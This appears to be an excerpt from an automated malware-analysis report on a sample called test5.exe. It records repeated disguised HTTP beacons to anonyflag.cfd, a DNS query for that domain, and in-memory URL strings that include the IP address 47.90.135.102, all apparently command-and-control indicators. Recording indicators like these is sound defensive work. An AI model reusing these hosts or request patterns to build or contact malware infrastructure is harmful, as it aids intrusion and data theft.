        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcnokflokbcekclifepapfholdcpcdhplfeaeebeepilglpfbcfhobplkgeppeabofbdbacpekbgneaaligifjihkpbnejbcnnagkbkenjnehokihmokdepcgomgijpgbilolaliilokfnoikomfafjncaacnbekjjdlffndomjgablehmappobcmchh.jpg HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8Referer: http://www.google.comHost: anonyflag.cfdPragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)Connection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: anonyflag.cfd
        Source: test5.exe, 00000000.00000003.1713803951.0000021553CA4000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1736911456.0000021553CA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
        Source: test5.exe, 00000000.00000003.2265856992.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2342319930.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1983240545.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2563724864.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2342319930.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1983240545.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2021648405.000002150C7A0000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1815398845.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2415228352.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2304004153.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1871884712.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2192543471.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2452787669.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1908657330.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1853432587.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2756737494.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2581918132.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2396320681.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2396320681.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2135161924.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2173223996.000002150C81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
        Source: test5.exe, 00000000.00000003.1736880484.000002150C81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.com4
        Source: test5.exe, 00000000.00000002.2903186062.000002150C72C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://47.90.135.102/
        Source: test5.exe, 00000000.00000002.2903186062.000002150C72C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://47.90.135.102/2Vcr
        Source: test5.exe, 00000000.00000002.2903186062.000002150C72C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://47.90.135.102/2Vcr.
        Source: test5.exe, 00000000.00000002.2903186062.000002150C72C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://47.90.135.102/2VcrB
        Source: test5.exe, 00000000.00000002.2903186062.000002150C72C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://47.90.135.102/2VcrZ
        Source: test5.exe, 00000000.00000003.2719078147.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2452787669.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2116772004.000002150C7E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anonyflag.cfd/
        Source: test5.exe, 00000000.00000003.1796650750.000002150C807000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anonyflag.cfd/7h
        Source: test5.exe, 00000000.00000003.2079907928.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2098334299.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2116772004.000002150C7E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anonyflag.cfd/G
        Source: test5.exe, 00000000.00000003.1926941171.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1945818103.000002150C81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anonyflag.cfd/Kb
        Source: test5.exe, 00000000.00000003.1833670081.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1815398845.000002150C807000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anonyflag.cfd/Kh
        Source: test5.exe, 00000000.00000003.2489739391.000002150C81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anonyflag.cfd/P
        Source: test5.exe, 00000000.00000003.2060130852.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2079665751.000002150C81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anonyflag.cfd/Y
        Source: test5.exe, 00000000.00000003.2265856992.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2284679172.000002150C81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anonyflag.cfd/cros
        Source: test5.exe, 00000000.00000003.2342319930.000002150C81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anonyflag.cfd/de
        Source: test5.exe, 00000000.00000003.2563724864.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2342319930.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2581918132.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2322882748.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2619903564.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2360513191.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2600593531.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2284679172.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2304004153.000002150C81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anonyflag.cfd/dep
        Source: test5.exe, 00000000.00000003.2659827113.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2835335954.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2681610028.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2814212738.000002150C81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anonyflag.cfd/der
        Source: test5.exe, 00000000.00000003.1871884712.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1853432587.000002150C807000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anonyflag.cfd/iiloksh
        Source: test5.exe, 00000000.00000003.2452787669.000002150C81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anonyflag.cfd/image/ghioaaimhfbphfpgmdmbbcgebfdddkopcngdliahpnnigkhnjffoflnmfojepkoelfdajcno
        Source: test5.exe, 00000000.00000003.2079907928.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2060189313.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2040694877.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2098334299.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2021648405.000002150C7E1000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2116772004.000002150C7E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anonyflag.cfd/o
        Source: test5.exe, 00000000.00000003.2415228352.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2396320681.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2135161924.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2173223996.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000002.2903186062.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2508432790.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2229582416.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2471560155.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2211383479.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2378590026.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2891419412.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2433982166.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2360513191.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2526696022.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2154433482.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2452787669.000002150C81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anonyflag.cfd/p
        Source: test5.exe, 00000000.00000003.1755611504.000002150C807000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.1983310053.000002150C7E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anonyflag.cfd/rovider
        Source: test5.exe, 00000000.00000003.2756737494.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2581918132.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2639261263.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2794728878.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2738354693.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2619903564.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2600593531.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2775374438.000002150C81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anonyflag.cfd/tography
        Source: test5.exe, 00000000.00000003.2835335954.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2794728878.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2814212738.000002150C81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anonyflag.cfd/vide
        Source: test5.exe, 00000000.00000003.2700818871.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2681610028.000002150C81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anonyflag.cfd/yflag.cfd/
        Source: test5.exe, 00000000.00000003.2508432790.000002150C81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anonyflag.cfd/yflag.cfd/P
        Source: test5.exe, 00000000.00000003.2098276910.000002150C81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anonyflag.cfd/yflag.cfd/Y
        Source: test5.exe, 00000000.00000003.2471560155.000002150C81A000.00000004.00000020.00020000.00000000.sdmp, test5.exe, 00000000.00000003.2452787669.000002150C81A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anonyflag.cfd/yflag.cfd/p
